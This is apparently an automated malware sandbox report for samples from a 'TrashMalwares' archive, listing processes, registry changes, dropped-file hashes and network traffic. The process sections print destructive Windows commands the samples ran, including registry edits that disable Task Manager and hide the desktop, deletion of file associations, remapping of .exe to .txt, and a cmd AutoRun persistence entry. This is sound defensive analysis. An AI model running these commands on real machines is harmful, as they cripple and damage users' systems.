| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Dro trojan. Virus prank.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Dro trojan. Virus prank.exe"
C:\Users\Admin\AppData\Local\Temp\START.exe
"C:\Users\Admin\AppData\Local\Temp\START.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ZbDz.vbs"
C:\Users\Admin\AppData\Local\Temp\Killer.exe
"C:\Users\Admin\AppData\Local\Temp\Killer.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZbDz.bat" "
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f /v "DisableTaskMgr" /t REG_DWORD /d 1
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Taskmgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Taskmgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Taskmgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Taskmgr.exe /F
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Taskmgr.exe /F
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f /v "DisableTaskMgr" /t REG_DWORD /d 1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Collapse_all.js"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SHK.vbs"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\SHK.bat" "
C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe
Shaking_horizontally.exe
C:\Windows\SysWOW64\timeout.exe
timeout /t 1
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM Shaking_horizontally.exe /F
C:\Users\Admin\AppData\Local\Temp\R_O_13-27.exe
"C:\Users\Admin\AppData\Local\Temp\R_O_13-27.exe"
C:\Windows\SysWOW64\calc.exe
"C:\Windows\System32\calc.exe"
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Users\Admin\AppData\Local\Temp\Draw_cursor.exe
"C:\Users\Admin\AppData\Local\Temp\Draw_cursor.exe"
C:\Users\Admin\AppData\Local\Temp\Error_icons.exe
"C:\Users\Admin\AppData\Local\Temp\Error_icons.exe"
C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
C:\Windows\SysWOW64\calc.exe
"C:\Windows\System32\calc.exe"
C:\Users\Admin\AppData\Local\Temp\Inversion_and_oil.exe
"C:\Users\Admin\AppData\Local\Temp\Inversion_and_oil.exe"
C:\Users\Admin\AppData\Local\Temp\New_Names.exe
"C:\Users\Admin\AppData\Local\Temp\New_Names.exe"
C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://neave.tv/
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2576 CREDAT:275457 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe
"C:\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe"
C:\Windows\SysWOW64\regedit.exe
"C:\Windows\System32\regedit.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | neave.tv | udp |
| US | 104.21.234.135:443 | neave.tv | tcp |
| US | 104.21.234.135:443 | neave.tv | tcp |
| US | 8.8.8.8:53 | neave.com | udp |
| US | 104.21.5.66:443 | neave.com | tcp |
| US | 104.21.5.66:443 | neave.com | tcp |
| US | 104.21.5.66:443 | neave.com | tcp |
| US | 104.21.5.66:443 | neave.com | tcp |
| US | 104.21.5.66:443 | neave.com | tcp |
| US | 104.21.5.66:443 | neave.com | tcp |
Files
\Users\Admin\AppData\Local\Temp\START.exe
| MD5 | b9e9b7fbd019b7e09e77bdec78ade264 |
| SHA1 | 0cdeda0e10d1f754d2171596d82e97e347089e01 |
| SHA256 | 227e8953a11d22ea948fe3b2426753a435993336ae1f49a6fe3c1dd0b70bf3b7 |
| SHA512 | d2e5dadb63d0ff75e48504720186483877ecde0354fe56d88255a079c116eef5b5c59eaef6ccc99217acce5d5755fd0a50fcf93b115f9408962535a572960a85 |
memory/2804-72-0x0000000002300000-0x000000000231B000-memory.dmp
memory/2804-79-0x0000000002300000-0x000000000231B000-memory.dmp
memory/2452-82-0x0000000000270000-0x000000000028B000-memory.dmp
\Users\Admin\AppData\Local\Temp\msvcr100d.dll
| MD5 | 440e9fd9824b8e97d3ca2f34bd1bfbd1 |
| SHA1 | 6852b2c592b3794da114d6ac5ea9d083317bf5af |
| SHA256 | eddaa890ac6470692f76eee9586c06d727a1caf7a242170ab1a3947523927396 |
| SHA512 | b458a0838159367727a63e417bba7c12b196f4d4af56703fe77ddcb2c28c3b6aab1d62335c513398f92c225f204e32b437fb49316b7c2b537c1cf877653c2ef8 |
C:\Users\Admin\AppData\Local\Temp\ZbDz.vbs
| MD5 | 8a25126b21c1f849b719999cb5d85e11 |
| SHA1 | 714fb5a246721c3117868c2229e7598ef7dfb2eb |
| SHA256 | 8ee9f21dd968d66fb71be502c6f2b96f3e0ee1954a4bcf2e7fffa45477fb7f38 |
| SHA512 | 8ea3d56e58410e369c42f6e16381ee802c8df58ee7f60ab937a19417e9a86f6877241ee7472df898bb85765d0bd3a5df2a58f97c717f5da8d32e7c8acf638c84 |
C:\Users\Admin\AppData\Local\Temp\Killer.exe
| MD5 | 32c1a77891071523637345563fcda855 |
| SHA1 | d582fa0290b7c04c99ded56c8ebc6e45df981300 |
| SHA256 | c8cb8941b2ebe27ba69600b8cb5725b9630fb631bd7c7e88dea9eebd8bd3bef3 |
| SHA512 | 61c6e7eddb5d8e880952c0fec6382082cbd33d0463ac556527598aaa6cf9bdb3755f395639d28be1a0cf4efa9f699cfdae06ecb5068b5f43b08b65354580704a |
memory/2452-87-0x0000000001DA0000-0x0000000001DE2000-memory.dmp
memory/840-89-0x0000000000D80000-0x0000000000DC2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ZbDz.bat
| MD5 | 90716ec6d805a3e478c0a26477138efd |
| SHA1 | ceae2264e1c3c6a0bf715cf54237c3f763cd5799 |
| SHA256 | f185b92c729b011a051d2d8775eee998da9e71ba6156a8da81b0fc1b25c90a77 |
| SHA512 | fbda3613b691e83299077b1378aa845ab59befd61bc177e54b950f55c857c8e2b208012c026c24489f354c88404172ba25d7584f1b825ccd6880598bcc65cc56 |
C:\Users\Admin\AppData\Local\Temp\Collapse_all.js
| MD5 | f60e1a46f1e7301a7eb36f723cdec4b3 |
| SHA1 | 5e46742927659e3fb0cef6c67542cb5ec2b0926d |
| SHA256 | 5fdab6a87288b929290f603f813a254efa019d8fe6c73d8757ebc543ba6949eb |
| SHA512 | 945f7f053700cf18a80553e09c3d64c8481aeb70d871dd00106bf66fcb33b4360b4412cb4bf9391e4dfd8e6df92d11ffe896bee6f864bdbdddedc1877714ee16 |
C:\Users\Admin\AppData\Local\Temp\SHK.vbs
| MD5 | 2643272752b857cbc69d843d92ff4879 |
| SHA1 | 10f1f87652b5747dd37ed141734e5af39af19ef2 |
| SHA256 | 53c3cd2ed0f6184b2cf0304acfbef726c3415528c903c69a86f3f9405b52179c |
| SHA512 | 3e7d2548ccbe96599b94a585c6a02e2ee2820ac6a8aec1ede270c8089623c3c41fd779fdf5a93b2cd1b9fca3ef2d2b915703f3438c7abd6e27f5a59626f01282 |
C:\Users\Admin\AppData\Local\Temp\SHK.bat
| MD5 | ab921b5b6a2b7232c8d2fd2f0dc78790 |
| SHA1 | fe0c9c4e5255f903bf9b006f27a913f39a115a54 |
| SHA256 | dfd827c3e9bb39c84ca90001a7718c55458145fcf035b4dba1001b201422a8da |
| SHA512 | 47d8ded63fd55f4490d0cd64c8f688fc5bb5814018a09e46f1eae0e36228589f4097f88f2f42e92d02cc068fd3e807aae219a4c4162474a561b3767331e8f98e |
\Users\Admin\AppData\Local\Temp\Shaking_horizontally.exe
| MD5 | d2404ad25ee623edb58a175d4bb0c7a1 |
| SHA1 | 4ca3589e630abebffe46782f5941f6253001bea9 |
| SHA256 | 35ee2069ddde1c079b1890eafd7041f59eb5170063f3f308b0b808dcc24623ce |
| SHA512 | 26758e01881ccbfa5f124fb8fa15e1712d228ea1aa9e552dd5020436f55e4e83d450128e799aff829e6215eacfcb284133fdf3ca952696cadfe061477b8d0b8c |
memory/2632-97-0x0000000000130000-0x000000000014B000-memory.dmp
memory/2292-101-0x0000000000840000-0x000000000085B000-memory.dmp
memory/2452-99-0x0000000000270000-0x000000000028B000-memory.dmp
memory/2452-102-0x0000000001DA0000-0x0000000001DE2000-memory.dmp
memory/840-103-0x0000000000D80000-0x0000000000DC2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\R_O_13-27.exe
| MD5 | 7c3647e86215919ec06437d9a5fce95d |
| SHA1 | 7bc1a0582e03bd9d7ee5ba1d66268d800d66c596 |
| SHA256 | 39e30df6628702de8a548ff031383c360dfc63a9399169bb93838f7eef57a6ed |
| SHA512 | d0a4991ad1cff73dbd0425e9f7190101f27811daa622c0fa5ba620566a9f95caae4430b0386a6ea9a7575a56931a45ca821f5274f8d2798c73d5154c8fe7e33d |
memory/2452-107-0x0000000000610000-0x000000000062B000-memory.dmp
memory/448-109-0x00000000010E0000-0x00000000010FB000-memory.dmp
memory/2452-110-0x0000000000610000-0x000000000062B000-memory.dmp
\Users\Admin\AppData\Local\Temp\Draw_cursor.exe
| MD5 | 4f5d56501b68860d79846d1c4a567459 |
| SHA1 | 548a514797c85e982a0f636030a18566895efaaa |
| SHA256 | 0df880855797fb52bcaac0e11074869ed409b9daaabfe8939ecd4039962292cd |
| SHA512 | 5efc549dcef528f0f5b09758ce18686106781788c0e78467d02fb12b7b138c0ca301d68e81305e7053f5471fa6c9c192d6bad81067fe70803e237b8dbf7d1f41 |
memory/2452-114-0x0000000000610000-0x000000000062B000-memory.dmp
memory/620-116-0x0000000001060000-0x000000000107B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Error_icons.exe
| MD5 | d9c07b7bc1a4df56ecb73941aafa2d78 |
| SHA1 | 9d64ca9262852e3ee4b5e098e2762401364e80e8 |
| SHA256 | 506b80e8f8551e29fa1e93082fefc99ce6613ad7abae895d61bdda92f4dce8c3 |
| SHA512 | ca282eedf7851df48e0ae001684ca4400b6a43e14893610972496e7c4c7002c508b95278896176ef4d49d371d95b6cc759609313a833bcdbc010a064cb28170f |
memory/2452-120-0x0000000000610000-0x000000000062B000-memory.dmp
memory/664-122-0x0000000001080000-0x000000000109B000-memory.dmp
memory/2452-123-0x0000000000610000-0x000000000062B000-memory.dmp
memory/620-124-0x0000000001060000-0x000000000107B000-memory.dmp
memory/2452-125-0x0000000000610000-0x000000000062B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Inversion_and_oil.exe
| MD5 | 7cfd733ea3aedb94f04013881f8a9f14 |
| SHA1 | 94642432fd416ec32f1cd17dfd9b23922432dcea |
| SHA256 | fceb50190c036057c6386387ed115b83a9fec153332b80be4d891cb9ef8f624a |
| SHA512 | 8c2b83a6aa96bed630e950cb66cd3a50e4789f303b9f2f3f2f6043f16a3a26d7dc9a56aa43cb3af0e548b207d5a228b88eaacb0b1872fc8abd4e1191f465e323 |
memory/2452-130-0x00000000001F0000-0x000000000020B000-memory.dmp
memory/3000-131-0x0000000000E70000-0x0000000000E8B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\New_Names.exe
| MD5 | dd799cfa99ea38299f32a744b4a9864c |
| SHA1 | 850457eea90f64bb760d078008f17799f8eb4843 |
| SHA256 | f9f469026252b2c7084755430c9b0d8939a8547b23a5bb32371102d7a3578ed1 |
| SHA512 | 9c74976ea217276bf5b291d629aa21ace989a45697748cb449eeba8d8c846e77e7ab66c1b701243ceb207db364d1abc376950c6b5f4cb92db068922ae41dcef3 |
memory/2832-136-0x0000000000320000-0x0000000000321000-memory.dmp
memory/2832-137-0x0000000000400000-0x0000000000468000-memory.dmp
memory/2452-138-0x00000000001F0000-0x000000000020B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8ADCJI8Z\icon-32[1].png
| MD5 | 161e12c343ad30aee3bfac354658e4f1 |
| SHA1 | 2951751e5f6f01e237dc0565d41c35d7040a29ce |
| SHA256 | 270582c227f5a93d8ff4a659a0075ea2af8952f0f73d24ba4d8c6a512a6465bf |
| SHA512 | e14f4b34b1d7f85b8a8674e0c9c87a9318de70fbb2aa46f0eecb7a033cdd84770d1afc3fc891482a278254ec671db8a7faf18c181b2a7aba034148b9460fec33 |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\3pl5scb\imagestore.dat
| MD5 | 2d59812bd22138c95e1a86a61d46e5ae |
| SHA1 | bafec6bdfbff08d61a09f096df4b07d1aa58fce3 |
| SHA256 | 7ed1a5b247df580d06efbc9f7c9e7577f7dadfcca81f179ad8f8b358c6f66fb0 |
| SHA512 | 506ee57bf2c6326cb8ba1a1021b3366d219543df13ecdbc4d0b4d8f0c5be46225c66eaf8413d055a645babaeb17aa249c3278cf8b49128dd81c69aef39abdb4d |
C:\Users\Admin\AppData\Local\Temp\Tar7524.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\Local\Temp\Cab7521.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 17dabc8408bbc690943f932394ff9ecb |
| SHA1 | 20887b99f05f4489036827176631117894f3ae5d |
| SHA256 | b7dd6529ed59f3e9930b89375aac9aa32c64936b37abb3c7467cb4ca80a20ca6 |
| SHA512 | 3c5c16ba760fa717c686a30c618e3ca34285065da75b5255e6a3de8316396b22ed2d77d388623223a5fd82f262f78ae1495e4896c6685fa32d81fafccb3d6ca7 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\Local\Temp\Tar7662.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fd05cf6cf5b14d5874b2184097ca99bf |
| SHA1 | 2979f669088da868602bf5d474c7d12b4f1729d8 |
| SHA256 | 577c6371fd783e78a82e5f5581b61ea98fd52b65c2a01ac557be9c690c5e66b3 |
| SHA512 | aa7e7cf2bedd3685a31ce7596a747fe08b9edccdc4ac85b21f923e9ceeb03274f61a8ac8a04cb18f03a0fd84fcdb6107771adedb7379d976b71abf98fd72f187 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | df4154af4451615fed7dc3f5ea1bd0fe |
| SHA1 | b8efd3bc6f5c77731abca5d447b63957bb930e54 |
| SHA256 | 2d431860517211ff3db9b940e954ad4b02ba2be21f5b41e9991ed2145c3737cb |
| SHA512 | 070bb9e1b77466dd2deff32c78af73c9d25f45e9ced070bf75436204ec517711c37b90f1d64c29b2cf96210b0e387428adfa15a6913359893dc4d4fda4b917a9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 1895f8ccf169e9111b5494ff871c240d |
| SHA1 | 400cc5b342b8bb47c2a1276bca1687c8bfd5a720 |
| SHA256 | 7d705cb0a3bc83bc3a35edddf8e0b4cde2c0431fae40582ecfdc81685238f89e |
| SHA512 | 26ba75157584ab5664dc6222c3153601cee39d15b8e4a0db724e3d1a851c0f53f49d3130f87443e27c1ab9e0c6475b678e527ae86b729ff69314e26e8bc8dbde |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a7fd5b331c4127ce292405a22e5cc69c |
| SHA1 | 4621909193dbe4fc8f2d57de381f8d02c6e4a1e3 |
| SHA256 | d378f3cb73a92fa57532b771d0839a6d3cfd21be1e33d0a152841c1e637b7b79 |
| SHA512 | 1c26168e3c3c4dc2820e06976323d18bf5f7e186daa6ce5257c24ccc7661aa3fb27af04f1539ca34d949931394770c8128450536e868254842cad3341a69e4a2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8e520369a3faea274df9586f9e4f7036 |
| SHA1 | 2f8163893f6bb46de54e102d49e21f454f015274 |
| SHA256 | bfeb219b36522872b66dee4a6c8f433536b9162d51432d41155371ea3feb62a7 |
| SHA512 | 5c458b0ab4cf578ccf7f402d97da9307afcf9b8ea4dc2b59d1dca9b23b303c6ad4a96012236fd76efcb64f1ffd54a247e600ba37700559e5283a8f400947d160 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 42b0a82735dfb2391168a5a386bb1020 |
| SHA1 | 4734858a964272de6623581156e32ffc1fb97961 |
| SHA256 | 40ec337e8776506fb4808db2c3b64a128bea3c0510bf3c9d8fa65b21134e20d2 |
| SHA512 | 97d6804eabc875fb676e3e48608563eb715abb21ca00a272bd8985407d8712ec7333b527f936d97ec3f1f5afdb38ddea21d06f197f2968d8281653b9c1a1c308 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f8c5c68cf8ae6c4ece3d970702788390 |
| SHA1 | e01b2e8c14daf8b8976d21a3464dbc3285908a34 |
| SHA256 | 8fecc21b7d4425ed4589941118473489072167b751dde8e06524f6e63122ffa6 |
| SHA512 | 6fd4d85be61437a443adbbc4191707a1f0efa50217f465f6059e5149361b4e86c322d455572bc24c59bc3100050801cc9e0cb8e82f8dbd7d8fa9be748ac4a02a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | bab66cc84696e571760552c47eac63e1 |
| SHA1 | 31fe1b2cede624d432c7c24c538d8333199a845f |
| SHA256 | 3da9aa3bc766280d87b95b646d22a883f1debcd0f9194e7f2529d8df20391be6 |
| SHA512 | 000781e326c65d76643730adf46b43d016755fda34dfdfbf33fa4cfc38d0e20bc412c5671c87acc7f9171c81fbc47be70f69be35c8154ce7d68ff6029969058b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a49c611a8ee9e98b5d2577b12b04fda2 |
| SHA1 | b72a54c186b97739ea8d2842c995db8f0fd294e5 |
| SHA256 | 80fe5beac9e9b621445d3d36e7208ef2c0a8a2b493753c7705e3be70cc5f6c93 |
| SHA512 | bac584865b17c203edb57165ecd86bda530f279422d71b304f63d592815299c675e30f2108ad2193f3e8c7ccd092ad90eae45dafa107fcf08ec215519889c737 |
memory/2832-667-0x0000000000400000-0x0000000000468000-memory.dmp
memory/2452-668-0x00000000001F0000-0x000000000020B000-memory.dmp
memory/2716-669-0x00000000000B0000-0x00000000000CB000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win7-20240221-en
Max time kernel
132s
Max time network
60s
Command Line
Signatures
Disables Task Manager via registry modification
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\gosha.bat | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\system32\gosha.bat | C:\Windows\system32\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.exe | C:\Windows\system32\cmd.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.exe\ = ".txt" | C:\Windows\system32\cmd.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\cmd.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\cmd.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\FaZoN.bat"
C:\Windows\system32\msg.exe
msg * Gosha created by GGmex your computer infected
C:\Windows\system32\taskkill.exe
taskkill /f /im explorer.exe
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d C:\Windows\explorer.exe /f
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Polices\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\msg.exe
msg * Your desktop has been crashed
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\msg.exe
msg * Your windows infected by gosha :)
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\syste m32\gosha.bat" /f
C:\Windows\system32\msg.exe
msg * Deleted files
C:\Windows\system32\msg.exe
msg * Your system has been removed...
C:\Windows\system32\msg.exe
msg * Click OK
C:\Windows\system32\cmd.exe
cmd
C:\Windows\system32\reg.exe
reg delete HKCR/.exe
C:\Windows\system32\reg.exe
reg delete HKCR/.dll
C:\Windows\system32\reg.exe
reg delete HKCR/*
C:\Windows\system32\cmd.exe
cmd
Network
Files
memory/2444-4-0x00000000040C0000-0x00000000040C1000-memory.dmp
memory/2444-5-0x00000000040C0000-0x00000000040C1000-memory.dmp
memory/2444-9-0x00000000037B0000-0x00000000037C0000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win7-20240220-en
Max time kernel
148s
Max time network
159s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\mbr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_mbr.exe | N/A |
| N/A | N/A | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\._cache_Synaptics.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\mbr.exe | N/A |
| N/A | N/A | C:\mbr.exe | N/A |
| N/A | N/A | C:\mbr.exe | N/A |
| N/A | N/A | C:\mbr.exe | N/A |
| N/A | N/A | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
| N/A | N/A | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
| N/A | N/A | C:\ProgramData\Synaptics\Synaptics.exe | N/A |
